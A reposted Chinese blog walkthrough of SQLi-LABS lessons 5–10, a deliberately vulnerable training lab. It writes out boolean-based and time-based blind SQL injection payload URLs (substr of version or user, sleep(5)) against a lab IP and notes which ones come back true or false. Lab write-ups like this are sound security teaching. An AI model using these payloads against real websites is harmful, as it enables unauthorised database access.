SQLi-LABS Page-1(Basic Challenges) Less5-Less10

转载

mob604756f23a7e 2021-05-11 00:13:14

Less5

GET - Double Injection - Single Quotes

http://10.10.202.112/sqli/Less-5?id=1

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges

http://10.10.202.112/sqli/Less-5?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

http://10.10.202.112/sqli/Less-5?id=1"

You are in...........

猜测SQL语句为：

select login_name,password from table_name where id='$id' limit 0,1

构造payload

http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=4--+ #false

http://10.10.202.112/sqli/Less-5?id=1' and substr(@@version,1,1)=5--+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_02

Less-6

GET - Double Injection - Double Quotes

http://10.10.202.112/sqli/Less-6?id=1"

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1

猜测SQL语句应该为：

select login_name,password from table_name where id="$id" limit 0,1

http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=4--+ #false

http://10.10.202.112/sqli/Less-6?id=1" and substr(@@version,1,1)=5--+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_03

http://10.10.202.112/sqli/Less-6?id=1" and sleep(5) and "s"="s

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_04

Less-7

GET - Dump into outfile - String

看了源码SQL语句为：

SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1

构造payload

http://10.10.202.112/sqli/Less-7?id=1')) and sleep(5) -- -

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_05

http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=4--+ #false

http://10.10.202.112/sqli/Less-7?id=1')) and substr(@@version,1,1)=5--+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_06

Less-8

GET - Blind - Boolian Based - Single Quotes

http://10.10.202.112/sqli/Less-8?id=1' #false

http://10.10.202.112/sqli/Less-8?id=1'--+ #true

猜测SQL：

SELECT * FROM users WHERE id='$id' LIMIT 0,1

http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='z' --+ #false

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_07

http://10.10.202.112/sqli/Less-8?id=1' and substr(user(),1,1)='r' --+ #true

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_08

Less-9

GET - Blind - Time based. - Single Quotes

源代码SQL

SELECT * FROM users WHERE id='$id' LIMIT 0,1

payload：

http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=4 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_09

http://10.10.202.112/sqli/Less-9?id=1' and substr(@@version,1,1)=5 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_10

Less-10

GET - Blind - Time based - double quotes

http://10.10.202.112/sqli/Less-10?id=1" and 1=1 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_11

http://10.10.202.112/sqli/Less-10?id=1" and 1=2 and sleep(5)--+

SQLi-LABS Page-1(Basic Challenges) Less5-Less10_Basic Challenges_12

待续。。。

本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。

上一篇：Dynamics 365触发Microsoft Flow自动生成PDF并作为附件送邮件

下一篇：产品经理如何使用 CODING 进行项目规划

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯

SQLi-LABS Page-1(Basic Challenges) Less5-Less10

SQLi-LABS Page-1(Basic Challenges) Less5-Less10

51CTO博客